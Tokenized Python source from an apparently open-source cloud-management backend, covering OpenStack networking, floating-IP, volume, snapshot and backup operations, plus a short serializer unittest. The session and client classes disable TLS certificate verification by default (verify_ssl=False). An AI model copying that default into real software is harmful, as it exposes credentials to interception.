external_network_id , <EOL> } <EOL> if vlan_id is not None and ips_count is not None : <EOL> for i in range ( ips_count ) : <EOL> ip = neutron . create_floatingip ( { '<STR_LIT>' : floating_ip } ) [ '<STR_LIT>' ] <EOL> logger . info ( '<STR_LIT>' , <EOL> ip [ '<STR_LIT>' ] , network_name ) <EOL> return membership . external_network_id <EOL> def detect_external_network ( self , membership , neutron ) : <EOL> routers = neutron . list_routers ( tenant_id = membership . tenant_id ) [ '<STR_LIT>' ] <EOL> if bool ( routers ) : <EOL> router = routers [ <NUM_LIT:0> ] <EOL> else : <EOL> logger . warning ( '<STR_LIT>' , membership ) <EOL> return <EOL> ext_gw = router . get ( '<STR_LIT>' , { } ) <EOL> if '<STR_LIT>' in ext_gw : <EOL> membership . external_network_id = ext_gw [ '<STR_LIT>' ] <EOL> membership . save ( ) <EOL> logger . info ( '<STR_LIT>' , ext_gw [ '<STR_LIT>' ] ) <EOL> def delete_external_network ( self , membership , neutron ) : <EOL> floating_ips = neutron . list_floatingips ( floating_network_id = membership . external_network_id ) [ '<STR_LIT>' ] <EOL> for ip in floating_ips : <EOL> neutron . delete_floatingip ( ip [ '<STR_LIT:id>' ] ) <EOL> logger . info ( '<STR_LIT>' , ip [ '<STR_LIT:id>' ] ) <EOL> ports = neutron . list_ports ( network_id = membership . external_network_id ) [ '<STR_LIT>' ] <EOL> for port in ports : <EOL> neutron . remove_interface_router ( port [ '<STR_LIT>' ] , { '<STR_LIT>' : port [ '<STR_LIT:id>' ] } ) <EOL> logger . info ( '<STR_LIT>' , port [ '<STR_LIT:id>' ] ) <EOL> subnets = neutron . list_subnets ( network_id = membership . external_network_id ) [ '<STR_LIT>' ] <EOL> for subnet in subnets : <EOL> neutron . delete_subnet ( subnet [ '<STR_LIT:id>' ] ) <EOL> logger . info ( '<STR_LIT>' , subnet [ '<STR_LIT:id>' ] ) <EOL> neutron . delete_network ( membership . external_network_id ) <EOL> logger . info ( '<STR_LIT>' , membership . external_network_id ) <EOL> membership . external_network_id = '<STR_LIT>' <EOL> membership . 
save ( ) <EOL> def get_or_create_router ( self , neutron , network_name , subnet_id , tenant_id , external = False , network_id = None ) : <EOL> router_name = '<STR_LIT>' . format ( network_name ) <EOL> routers = neutron . list_routers ( tenant_id = tenant_id ) [ '<STR_LIT>' ] <EOL> if routers : <EOL> logger . info ( '<STR_LIT>' , tenant_id ) <EOL> router = routers [ <NUM_LIT:0> ] <EOL> else : <EOL> router = neutron . create_router ( { '<STR_LIT>' : { '<STR_LIT:name>' : router_name , '<STR_LIT>' : tenant_id } } ) [ '<STR_LIT>' ] <EOL> logger . info ( '<STR_LIT>' , router [ '<STR_LIT:name>' ] ) <EOL> try : <EOL> if not external : <EOL> ports = neutron . list_ports ( device_id = router [ '<STR_LIT:id>' ] , tenant_id = tenant_id ) [ '<STR_LIT>' ] <EOL> if not ports : <EOL> neutron . add_interface_router ( router [ '<STR_LIT:id>' ] , { '<STR_LIT>' : subnet_id } ) <EOL> logger . info ( '<STR_LIT>' , subnet_id , router_name ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , subnet_id , router_name ) <EOL> else : <EOL> if ( not router . get ( '<STR_LIT>' ) or <EOL> router [ '<STR_LIT>' ] . get ( '<STR_LIT>' ) != network_id ) : <EOL> neutron . add_gateway_router ( router [ '<STR_LIT:id>' ] , { '<STR_LIT>' : network_id } ) <EOL> logger . info ( '<STR_LIT>' , network_id , router_name ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , network_id , router_name ) <EOL> except neutron_exceptions . NeutronClientException as e : <EOL> logger . warning ( e ) <EOL> return router [ '<STR_LIT:id>' ] <EOL> def get_hypervisors_statistics ( self , nova ) : <EOL> return nova . hypervisors . statistics ( ) . _info <EOL> def get_key_name ( self , public_key ) : <EOL> safe_name = self . sanitize_key_name ( public_key . name ) <EOL> key_name = '<STR_LIT>' . format ( public_key . uuid . hex , safe_name ) <EOL> return key_name <EOL> def sanitize_key_name ( self , key_name ) : <EOL> return re . 
sub ( r'<STR_LIT>' , '<STR_LIT:_>' , key_name ) [ : <NUM_LIT> ] <EOL> def _get_project_ascii_name ( self , project ) : <EOL> return '<STR_LIT>' . join ( [ c for c in project . name if ord ( c ) < <NUM_LIT> ] ) <EOL> def get_tenant_name ( self , membership ) : <EOL> return '<STR_LIT>' % { <EOL> '<STR_LIT>' : self . _get_project_ascii_name ( membership . project ) [ : <NUM_LIT:15> ] , <EOL> '<STR_LIT>' : membership . project . uuid . hex [ : <NUM_LIT:4> ] <EOL> } <EOL> def get_tenant_internal_network_name ( self , membership ) : <EOL> tenant_name = self . get_tenant_name ( membership ) <EOL> return '<STR_LIT>' . format ( tenant_name ) <EOL> def create_backend_name ( self ) : <EOL> return '<STR_LIT>' . format ( uuid . uuid4 ( ) . hex ) <EOL> def _wait_for_instance_status ( self , server_id , nova , complete_status , <EOL> error_status = None , retries = <NUM_LIT> , poll_interval = <NUM_LIT:3> ) : <EOL> return self . _wait_for_object_status ( <EOL> server_id , nova . servers . get , complete_status , error_status , retries , poll_interval ) <EOL> def _wait_for_volume_status ( self , volume_id , cinder , complete_status , <EOL> error_status = None , retries = <NUM_LIT> , poll_interval = <NUM_LIT:3> ) : <EOL> return self . _wait_for_object_status ( <EOL> volume_id , cinder . volumes . get , complete_status , error_status , retries , poll_interval ) <EOL> def _wait_for_snapshot_status ( self , snapshot_id , cinder , complete_status , error_status , retries = <NUM_LIT> , poll_interval = <NUM_LIT:3> ) : <EOL> return self . _wait_for_object_status ( <EOL> snapshot_id , cinder . volume_snapshots . get , complete_status , error_status , retries , poll_interval ) <EOL> def _wait_for_backup_status ( self , backup , cinder , complete_status , error_status , retries = <NUM_LIT> , poll_interval = <NUM_LIT:3> ) : <EOL> return self . _wait_for_object_status ( <EOL> backup , cinder . backups . 
get , complete_status , error_status , retries , poll_interval ) <EOL> def _wait_for_object_status ( self , obj_id , client_get_method , complete_status , error_status = None , <EOL> retries = <NUM_LIT:30> , poll_interval = <NUM_LIT:3> ) : <EOL> complete_state_predicate = lambda o : o . status == complete_status <EOL> if error_status is not None : <EOL> error_state_predicate = lambda o : o . status == error_status <EOL> else : <EOL> error_state_predicate = lambda _ : False <EOL> for _ in range ( retries ) : <EOL> obj = client_get_method ( obj_id ) <EOL> if complete_state_predicate ( obj ) : <EOL> return True <EOL> if error_state_predicate ( obj ) : <EOL> return False <EOL> time . sleep ( poll_interval ) <EOL> else : <EOL> return False <EOL> def _wait_for_volume_deletion ( self , volume_id , cinder , retries = <NUM_LIT> , poll_interval = <NUM_LIT:3> ) : <EOL> try : <EOL> for _ in range ( retries ) : <EOL> cinder . volumes . get ( volume_id ) <EOL> time . sleep ( poll_interval ) <EOL> return False <EOL> except cinder_exceptions . NotFound : <EOL> return True <EOL> def _wait_for_snapshot_deletion ( self , snapshot_id , cinder , retries = <NUM_LIT> , poll_interval = <NUM_LIT:3> ) : <EOL> try : <EOL> for _ in range ( retries ) : <EOL> cinder . volume_snapshots . get ( snapshot_id ) <EOL> time . sleep ( poll_interval ) <EOL> return False <EOL> except ( cinder_exceptions . NotFound , keystone_exceptions . NotFound ) : <EOL> return True <EOL> def _wait_for_instance_deletion ( self , backend_instance_id , nova , retries = <NUM_LIT> , poll_interval = <NUM_LIT:3> ) : <EOL> try : <EOL> for _ in range ( retries ) : <EOL> nova . servers . get ( backend_instance_id ) <EOL> time . sleep ( poll_interval ) <EOL> return False <EOL> except nova_exceptions . NotFound : <EOL> return True <EOL> def _attach_volume ( self , nova , cinder , server_id , volume_id , instance_uuid ) : <EOL> nova . volumes . create_server_volume ( server_id , volume_id , None ) <EOL> if not self . 
_wait_for_volume_status ( volume_id , cinder , '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> logger . error ( <EOL> '<STR_LIT>' , <EOL> volume_id , instance_uuid , <EOL> ) <EOL> raise CloudBackendError ( <EOL> '<STR_LIT>' <EOL> % ( volume_id , instance_uuid ) <EOL> ) <EOL> def _detach_volume ( self , nova , cinder , server_id , volume_id , instance_uuid ) : <EOL> nova . volumes . delete_server_volume ( server_id , volume_id ) <EOL> if not self . _wait_for_volume_status ( volume_id , cinder , '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> logger . error ( <EOL> '<STR_LIT>' , <EOL> volume_id , instance_uuid , <EOL> ) <EOL> raise CloudBackendError ( <EOL> '<STR_LIT>' <EOL> % ( volume_id , instance_uuid ) <EOL> ) <EOL> def _extend_volume ( self , cinder , volume , new_backend_size ) : <EOL> cinder . volumes . extend ( volume , new_backend_size ) <EOL> if not self . _wait_for_volume_status ( volume . id , cinder , '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> logger . error ( <EOL> '<STR_LIT>' , <EOL> volume . id , <EOL> ) <EOL> raise CloudBackendError ( <EOL> '<STR_LIT>' <EOL> % volume . id , <EOL> ) <EOL> def push_floating_ip_to_instance ( self , server , instance , nova ) : <EOL> if not instance . external_ips or not instance . internal_ips : <EOL> return <EOL> logger . debug ( '<STR_LIT>' , <EOL> instance . external_ips , instance . uuid ) <EOL> membership = instance . cloud_project_membership <EOL> try : <EOL> floating_ip = membership . floating_ips . get ( <EOL> status__in = ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> address = instance . external_ips , <EOL> backend_network_id = membership . external_network_id <EOL> ) <EOL> server . add_floating_ip ( address = instance . external_ips , fixed_address = instance . internal_ips ) <EOL> except ( <EOL> nova_exceptions . ClientException , <EOL> ObjectDoesNotExist , <EOL> MultipleObjectsReturned , <EOL> KeyError , <EOL> IndexError , <EOL> ) : <EOL> logger . exception ( '<STR_LIT>' , <EOL> instance . external_ips , instance . 
uuid ) <EOL> instance . set_erred ( ) <EOL> instance . save ( ) <EOL> else : <EOL> floating_ip . status = '<STR_LIT>' <EOL> floating_ip . save ( ) <EOL> logger . info ( '<STR_LIT>' , <EOL> instance . external_ips , instance . uuid ) <EOL> def release_floating_ip_from_instance ( self , instance ) : <EOL> if not instance . external_ips : <EOL> return <EOL> membership = instance . cloud_project_membership <EOL> try : <EOL> floating_ip = membership . floating_ips . get ( <EOL> status = '<STR_LIT>' , <EOL> address = instance . external_ips , <EOL> backend_network_id = membership . external_network_id <EOL> ) <EOL> except ( ObjectDoesNotExist , MultipleObjectsReturned ) : <EOL> logger . warning ( '<STR_LIT>' , <EOL> instance . external_ips , instance . uuid ) <EOL> else : <EOL> floating_ip . status = '<STR_LIT>' <EOL> floating_ip . save ( ) <EOL> logger . info ( '<STR_LIT>' , <EOL> instance . external_ips , instance . uuid ) <EOL> def allocate_floating_ip_address ( self , neutron , membership ) : <EOL> try : <EOL> data = { '<STR_LIT>' : membership . external_network_id , '<STR_LIT>' : membership . tenant_id } <EOL> ip_address = neutron . create_floatingip ( { '<STR_LIT>' : data } ) [ '<STR_LIT>' ] <EOL> except neutron_exceptions . NeutronClientException as e : <EOL> logger . exception ( '<STR_LIT>' , <EOL> membership . external_network_id ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> membership . floating_ips . create ( <EOL> status = '<STR_LIT>' , <EOL> address = ip_address [ '<STR_LIT>' ] , <EOL> backend_id = ip_address [ '<STR_LIT:id>' ] , <EOL> backend_network_id = ip_address [ '<STR_LIT>' ] <EOL> ) <EOL> logger . info ( '<STR_LIT>' , <EOL> ip_address [ '<STR_LIT>' ] , membership . external_network_id ) <EOL> def assign_floating_ip_to_instance ( self , nova , instance , floating_ip ) : <EOL> nova . servers . add_floating_ip ( server = instance . backend_id , address = floating_ip . address ) <EOL> floating_ip . 
status = '<STR_LIT>' <EOL> floating_ip . save ( ) <EOL> instance . external_ips = floating_ip . address <EOL> instance . save ( ) <EOL> logger . info ( '<STR_LIT>' , <EOL> floating_ip . address , instance . uuid ) <EOL> def get_attached_volumes ( self , server_id , nova ) : <EOL> """<STR_LIT>""" <EOL> return nova . volumes . get_server_volumes ( server_id ) <EOL> def create_snapshot ( self , volume_id , cinder ) : <EOL> """<STR_LIT>""" <EOL> snapshot = cinder . volume_snapshots . create ( <EOL> volume_id , force = True , display_name = '<STR_LIT>' % volume_id ) <EOL> logger . debug ( '<STR_LIT>' % snapshot . id ) <EOL> if not self . _wait_for_snapshot_status ( snapshot . id , cinder , '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> logger . error ( '<STR_LIT>' , volume_id ) <EOL> raise CloudBackendInternalError ( ) <EOL> logger . info ( '<STR_LIT>' , snapshot . id , volume_id ) <EOL> return snapshot <EOL> def delete_snapshot ( self , snapshot_id , cinder ) : <EOL> """<STR_LIT>""" <EOL> logger . debug ( '<STR_LIT>' , snapshot_id ) <EOL> if not self . _wait_for_snapshot_status ( snapshot_id , cinder , '<STR_LIT>' , '<STR_LIT:error>' , poll_interval = <NUM_LIT> , retries = <NUM_LIT:30> ) : <EOL> logger . exception ( '<STR_LIT>' , snapshot_id ) <EOL> raise CloudBackendInternalError ( ) <EOL> cinder . volume_snapshots . delete ( snapshot_id ) <EOL> logger . info ( '<STR_LIT>' , snapshot_id ) <EOL> def create_volume_from_snapshot ( self , snapshot_id , cinder , prefix = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> snapshot = cinder . volume_snapshots . get ( snapshot_id ) <EOL> volume_size = snapshot . size <EOL> volume_name = prefix + ( '<STR_LIT>' % snapshot . volume_id ) <EOL> logger . debug ( '<STR_LIT>' , snapshot_id ) <EOL> created_volume = cinder . volumes . create ( volume_size , snapshot_id = snapshot_id , <EOL> display_name = volume_name ) <EOL> volume_id = created_volume . id <EOL> if not self . 
_wait_for_volume_status ( volume_id , cinder , '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> logger . error ( '<STR_LIT>' , snapshot_id ) <EOL> raise CloudBackendInternalError ( ) <EOL> logger . info ( '<STR_LIT>' , <EOL> volume_id , snapshot_id ) <EOL> return volume_id <EOL> def delete_volume ( self , volume_id , cinder ) : <EOL> """<STR_LIT>""" <EOL> logger . debug ( '<STR_LIT>' % volume_id ) <EOL> if not self . _wait_for_volume_status ( volume_id , cinder , '<STR_LIT>' , '<STR_LIT:error>' , poll_interval = <NUM_LIT:20> ) : <EOL> logger . exception ( '<STR_LIT>' , volume_id ) <EOL> raise CloudBackendInternalError ( ) <EOL> cinder . volumes . delete ( volume_id ) <EOL> logger . info ( '<STR_LIT>' ) <EOL> def get_backup_info ( self , backup_id , cinder ) : <EOL> """<STR_LIT>""" <EOL> backup_info = cinder . backups . get ( backup_id ) <EOL> return { <EOL> '<STR_LIT:name>' : backup_info . name , <EOL> '<STR_LIT:status>' : backup_info . status , <EOL> '<STR_LIT:description>' : backup_info . description <EOL> } <EOL> def create_volume_backup ( self , volume_id , bckp_desc , cinder ) : <EOL> """<STR_LIT>""" <EOL> backup_name = '<STR_LIT>' % volume_id <EOL> logger . debug ( '<STR_LIT>' % volume_id ) <EOL> if not self . _wait_for_volume_status ( volume_id , cinder , '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> logger . exception ( '<STR_LIT>' , volume_id ) <EOL> raise CloudBackendInternalError ( ) <EOL> backup_volume = cinder . backups . create ( volume_id , name = backup_name , description = bckp_desc ) <EOL> logger . info ( '<STR_LIT>' , volume_id ) <EOL> return backup_volume . id <EOL> def restore_volume_backup ( self , backup_id , cinder ) : <EOL> """<STR_LIT>""" <EOL> logger . debug ( '<STR_LIT>' , backup_id ) <EOL> if not self . _wait_for_backup_status ( backup_id , cinder , '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> logger . exception ( '<STR_LIT>' , backup_id ) <EOL> raise CloudBackendInternalError ( ) <EOL> restore = cinder . restores . 
restore ( backup_id ) <EOL> logger . debug ( '<STR_LIT>' , backup_id ) <EOL> volume_id = restore . volume_id <EOL> if not self . _wait_for_volume_status ( volume_id , cinder , '<STR_LIT>' , '<STR_LIT>' , poll_interval = <NUM_LIT:20> ) : <EOL> logger . exception ( '<STR_LIT>' , backup_id ) <EOL> raise CloudBackendInternalError ( ) <EOL> logger . info ( '<STR_LIT>' , volume_id ) <EOL> logger . info ( '<STR_LIT>' , backup_id ) <EOL> return volume_id <EOL> def delete_backup ( self , backup_id , cinder ) : <EOL> """<STR_LIT>""" <EOL> backup = cinder . backups . get ( backup_id ) <EOL> logger . debug ( '<STR_LIT>' , backup_id ) <EOL> if not self . _wait_for_backup_status ( backup_id , cinder , '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> logger . exception ( '<STR_LIT>' , backup_id , backup . status ) <EOL> raise CloudBackendInternalError ( ) <EOL> else : <EOL> cinder . backups . delete ( backup_id ) <EOL> logger . info ( '<STR_LIT>' , backup_id ) <EOL> def create_vm ( self , server_id , device_map , nova ) : <EOL> """<STR_LIT>""" <EOL> server = nova . servers . get ( server_id ) <EOL> new_server_name = '<STR_LIT>' % server . name <EOL> flavor = nova . flavors . get ( server . flavor . get ( '<STR_LIT:id>' ) ) <EOL> new_server = nova . servers . create ( new_server_name , None , flavor , block_device_mapping = device_map ) <EOL> logger . debug ( '<STR_LIT>' , new_server . id ) <EOL> while new_server . status == '<STR_LIT>' : <EOL> time . sleep ( <NUM_LIT:5> ) <EOL> new_server = nova . servers . get ( new_server . id ) <EOL> logger . info ( '<STR_LIT>' , new_server . id ) <EOL> return new_server . id <EOL> def _are_rules_equal ( self , backend_rule , nc_rule ) : <EOL> """<STR_LIT>""" <EOL> if backend_rule [ '<STR_LIT>' ] != nc_rule . from_port : <EOL> return False <EOL> if backend_rule [ '<STR_LIT>' ] != nc_rule . to_port : <EOL> return False <EOL> if backend_rule [ '<STR_LIT>' ] != nc_rule . protocol : <EOL> return False <EOL> if backend_rule [ '<STR_LIT>' ] . 
get ( '<STR_LIT>' , '<STR_LIT>' ) != nc_rule . cidr : <EOL> return False <EOL> return True <EOL> def _are_security_groups_equal ( self , backend_security_group , nc_security_group ) : <EOL> if backend_security_group . name != nc_security_group . name : <EOL> return False <EOL> if len ( backend_security_group . rules ) != nc_security_group . rules . count ( ) : <EOL> return False <EOL> for backend_rule , nc_rule in zip ( backend_security_group . rules , nc_security_group . rules . all ( ) ) : <EOL> if not self . _are_rules_equal ( backend_rule , nc_rule ) : <EOL> return False <EOL> return True <EOL> def _get_instance_volumes ( self , nova , cinder , backend_instance_id ) : <EOL> try : <EOL> attached_volume_ids = [ <EOL> v . volumeId <EOL> for v in nova . volumes . get_server_volumes ( backend_instance_id ) <EOL> ] <EOL> if len ( attached_volume_ids ) != <NUM_LIT:2> : <EOL> logger . info ( '<STR_LIT>' , <EOL> backend_instance_id , len ( attached_volume_ids ) ) <EOL> raise LookupError <EOL> attached_volumes = [ <EOL> cinder . volumes . get ( volume_id ) <EOL> for volume_id in attached_volume_ids <EOL> ] <EOL> system_volume = next ( v for v in attached_volumes if v . bootable == '<STR_LIT:true>' ) <EOL> data_volume = next ( v for v in attached_volumes if v . bootable == '<STR_LIT:false>' ) <EOL> except ( cinder_exceptions . ClientException , StopIteration ) as e : <EOL> logger . info ( '<STR_LIT>' , backend_instance_id ) <EOL> six . reraise ( LookupError , e ) <EOL> else : <EOL> return system_volume , data_volume <EOL> def _get_instance_template ( self , system_volume , membership , backend_instance_id ) : <EOL> try : <EOL> image_id = system_volume . volume_image_metadata [ '<STR_LIT>' ] <EOL> return models . Template . objects . get ( <EOL> images__backend_id = image_id , <EOL> images__cloud__cloudprojectmembership = membership , <EOL> ) <EOL> except ( KeyError , AttributeError ) : <EOL> logger . 
info ( '<STR_LIT>' , <EOL> backend_instance_id ) <EOL> raise LookupError <EOL> except ( models . Template . DoesNotExist , models . Template . MultipleObjectsReturned ) : <EOL> logger . info ( '<STR_LIT>' , <EOL> backend_instance_id ) <EOL> raise LookupError <EOL> def _get_flavor_info ( self , nova , backend_instance ) : <EOL> try : <EOL> flavor_id = backend_instance . flavor [ '<STR_LIT:id>' ] <EOL> flavor = nova . flavors . get ( flavor_id ) <EOL> except ( KeyError , AttributeError ) : <EOL> logger . info ( '<STR_LIT>' , <EOL> backend_instance . id ) <EOL> raise LookupError <EOL> except nova_exceptions . ClientException as e : <EOL> logger . info ( '<STR_LIT>' , <EOL> backend_instance . id ) <EOL> six . reraise ( LookupError , e ) <EOL> else : <EOL> cores = flavor . vcpus <EOL> ram = self . get_core_ram_size ( flavor . ram ) <EOL> return cores , ram , flavor . name <EOL> def _normalize_security_group_rule ( self , rule ) : <EOL> if rule [ '<STR_LIT>' ] is None : <EOL> rule [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> if '<STR_LIT>' not in rule [ '<STR_LIT>' ] : <EOL> rule [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> return rule <EOL> def _get_instance_state ( self , instance ) : <EOL> nova_to_nodeconductor = { <EOL> '<STR_LIT>' : models . Instance . States . ONLINE , <EOL> '<STR_LIT>' : models . Instance . States . PROVISIONING , <EOL> '<STR_LIT>' : models . Instance . States . ERRED , <EOL> '<STR_LIT>' : models . Instance . States . ERRED , <EOL> '<STR_LIT>' : models . Instance . States . STOPPING , <EOL> '<STR_LIT>' : models . Instance . States . STOPPING , <EOL> '<STR_LIT>' : models . Instance . States . STARTING , <EOL> '<STR_LIT>' : models . Instance . States . ONLINE , <EOL> '<STR_LIT>' : models . Instance . States . OFFLINE , <EOL> '<STR_LIT>' : models . Instance . States . ONLINE , <EOL> '<STR_LIT>' : models . Instance . States . OFFLINE , <EOL> '<STR_LIT>' : models . Instance . States . STOPPING , <EOL> '<STR_LIT>' : models . Instance . States . 
OFFLINE , <EOL> '<STR_LIT>' : models . Instance . States . OFFLINE , <EOL> '<STR_LIT>' : models . Instance . States . OFFLINE , <EOL> '<STR_LIT>' : models . Instance . States . ONLINE , <EOL> } <EOL> return nova_to_nodeconductor . get ( instance . status , <EOL> models . Instance . States . ERRED ) <EOL> def _get_instance_start_time ( self , instance ) : <EOL> try : <EOL> launch_time = instance . to_dict ( ) [ '<STR_LIT>' ] <EOL> d = dateparse . parse_datetime ( launch_time ) <EOL> except ( KeyError , ValueError ) : <EOL> return None <EOL> else : <EOL> if timezone . is_naive ( d ) : <EOL> d = timezone . make_aware ( d , timezone . utc ) <EOL> return d <EOL> def _get_instance_ips ( self , backend_instance ) : <EOL> extracted_ips = { } <EOL> for _ , net_conf in backend_instance . addresses . items ( ) : <EOL> for ip in net_conf : <EOL> if ip [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> extracted_ips [ '<STR_LIT>' ] = ip [ '<STR_LIT>' ] <EOL> continue <EOL> if ip [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> extracted_ips [ '<STR_LIT>' ] = ip [ '<STR_LIT>' ] <EOL> continue <EOL> return extracted_ips </s>
<s> import unittest <EOL> from nodeconductor . logging import serializers , loggers <EOL> class HookSerializerTest ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . events = loggers . get_valid_events ( ) [ : <NUM_LIT:3> ] <EOL> def test_valid_web_settings ( self ) : <EOL> serializer = serializers . WebHookSerializer ( data = { <EOL> '<STR_LIT>' : self . events , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ) <EOL> self . assertTrue ( serializer . is_valid ( ) , serializer . errors ) <EOL> def test_valid_email_settings ( self ) : <EOL> serializer = serializers . EmailHookSerializer ( data = { <EOL> '<STR_LIT>' : self . events , <EOL> '<STR_LIT:email>' : '<STR_LIT>' <EOL> } ) <EOL> self . assertTrue ( serializer . is_valid ( ) ) <EOL> def test_invalid_web_settings ( self ) : <EOL> serializer = serializers . WebHookSerializer ( data = { <EOL> '<STR_LIT>' : self . events , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ) <EOL> self . assertFalse ( serializer . is_valid ( ) ) <EOL> self . assertIn ( '<STR_LIT>' , serializer . errors ) <EOL> def test_invalid_events ( self ) : <EOL> serializer = serializers . WebHookSerializer ( data = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ) <EOL> self . assertFalse ( serializer . is_valid ( ) ) <EOL> self . assertIn ( '<STR_LIT>' , serializer . errors ) </s>
<s> import datetime <EOL> import dateutil . parser <EOL> import logging <EOL> import re <EOL> import time <EOL> import uuid <EOL> from django . conf import settings as django_settings <EOL> from django . core . exceptions import ObjectDoesNotExist , MultipleObjectsReturned <EOL> from django . db import transaction <EOL> from django . utils import six , dateparse , timezone <EOL> from requests import ConnectionError <EOL> from keystoneclient . auth . identity import v2 <EOL> from keystoneclient . service_catalog import ServiceCatalog <EOL> from keystoneclient import session as keystone_session <EOL> from ceilometerclient import client as ceilometer_client <EOL> from cinderclient . v1 import client as cinder_client <EOL> from glanceclient . v1 import client as glance_client <EOL> from keystoneclient . v2_0 import client as keystone_client <EOL> from neutronclient . v2_0 import client as neutron_client <EOL> from novaclient . v1_1 import client as nova_client <EOL> from cinderclient import exceptions as cinder_exceptions <EOL> from glanceclient import exc as glance_exceptions <EOL> from keystoneclient import exceptions as keystone_exceptions <EOL> from neutronclient . client import exceptions as neutron_exceptions <EOL> from novaclient import exceptions as nova_exceptions <EOL> from nodeconductor . core . models import StateMixin <EOL> from nodeconductor . core . tasks import send_task <EOL> from nodeconductor . structure import ServiceBackend , ServiceBackendError , log_backend_action <EOL> from nodeconductor . structure . log import event_logger <EOL> from nodeconductor . openstack import models <EOL> logger = logging . getLogger ( __name__ ) <EOL> class OpenStackBackendError ( ServiceBackendError ) : <EOL> pass <EOL> class OpenStackSession ( dict ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ks_session = None , verify_ssl = False , ** credentials ) : <EOL> self . keystone_session = ks_session <EOL> if not self . keystone_session : <EOL> auth_plugin = v2 . 
Password ( ** credentials ) <EOL> self . keystone_session = keystone_session . Session ( auth = auth_plugin , verify = verify_ssl ) <EOL> try : <EOL> self . keystone_session . get_token ( ) <EOL> except ( keystone_exceptions . AuthorizationFailure , keystone_exceptions . ConnectionRefused ) as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> for opt in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> self [ opt ] = getattr ( self . auth , opt ) <EOL> def __getattr__ ( self , name ) : <EOL> return getattr ( self . keystone_session , name ) <EOL> @ classmethod <EOL> def recover ( cls , session , verify_ssl = False ) : <EOL> if not isinstance ( session , dict ) or not session . get ( '<STR_LIT>' ) : <EOL> raise OpenStackBackendError ( '<STR_LIT>' ) <EOL> args = { '<STR_LIT>' : session [ '<STR_LIT>' ] , '<STR_LIT>' : session [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] } <EOL> if session [ '<STR_LIT>' ] : <EOL> args [ '<STR_LIT>' ] = session [ '<STR_LIT>' ] <EOL> elif session [ '<STR_LIT>' ] : <EOL> args [ '<STR_LIT>' ] = session [ '<STR_LIT>' ] <EOL> ks_session = keystone_session . Session ( auth = v2 . Token ( ** args ) , verify = verify_ssl ) <EOL> return cls ( <EOL> ks_session = ks_session , <EOL> tenant_id = session [ '<STR_LIT>' ] , <EOL> tenant_name = session [ '<STR_LIT>' ] ) <EOL> def validate ( self ) : <EOL> expiresat = dateutil . parser . parse ( self . auth . auth_ref [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> if expiresat > timezone . now ( ) + datetime . timedelta ( minutes = <NUM_LIT:10> ) : <EOL> return True <EOL> raise OpenStackBackendError ( '<STR_LIT>' ) <EOL> def __str__ ( self ) : <EOL> return str ( { k : v if k != '<STR_LIT:password>' else '<STR_LIT>' for k , v in self } ) <EOL> class OpenStackClient ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , session = None , verify_ssl = False , ** credentials ) : <EOL> self . 
verify_ssl = verify_ssl <EOL> if session : <EOL> if isinstance ( session , dict ) : <EOL> logger . info ( '<STR_LIT>' ) <EOL> self . session = OpenStackSession . recover ( session , verify_ssl = verify_ssl ) <EOL> self . session . validate ( ) <EOL> else : <EOL> self . session = session <EOL> else : <EOL> try : <EOL> self . session = OpenStackSession ( verify_ssl = verify_ssl , ** credentials ) <EOL> except AttributeError as e : <EOL> logger . error ( '<STR_LIT>' ) <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> @ property <EOL> def keystone ( self ) : <EOL> return keystone_client . Client ( session = self . session . keystone_session ) <EOL> @ property <EOL> def nova ( self ) : <EOL> try : <EOL> return nova_client . Client ( session = self . session . keystone_session ) <EOL> except ( nova_exceptions . ClientException , keystone_exceptions . ClientException ) as e : <EOL> logger . exception ( '<STR_LIT>' , e ) <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> @ property <EOL> def neutron ( self ) : <EOL> try : <EOL> return neutron_client . Client ( session = self . session . keystone_session ) <EOL> except ( neutron_exceptions . NeutronClientException , keystone_exceptions . ClientException ) as e : <EOL> logger . exception ( '<STR_LIT>' , e ) <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> @ property <EOL> def cinder ( self ) : <EOL> try : <EOL> return cinder_client . Client ( session = self . session . keystone_session ) <EOL> except ( cinder_exceptions . ClientException , keystone_exceptions . ClientException ) as e : <EOL> logger . exception ( '<STR_LIT>' , e ) <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> @ property <EOL> def glance ( self ) : <EOL> catalog = ServiceCatalog . factory ( self . session . auth . auth_ref ) <EOL> endpoint = catalog . url_for ( service_type = '<STR_LIT:image>' ) <EOL> kwargs = { <EOL> '<STR_LIT>' : self . session . get_token ( ) , <EOL> '<STR_LIT>' : not self . 
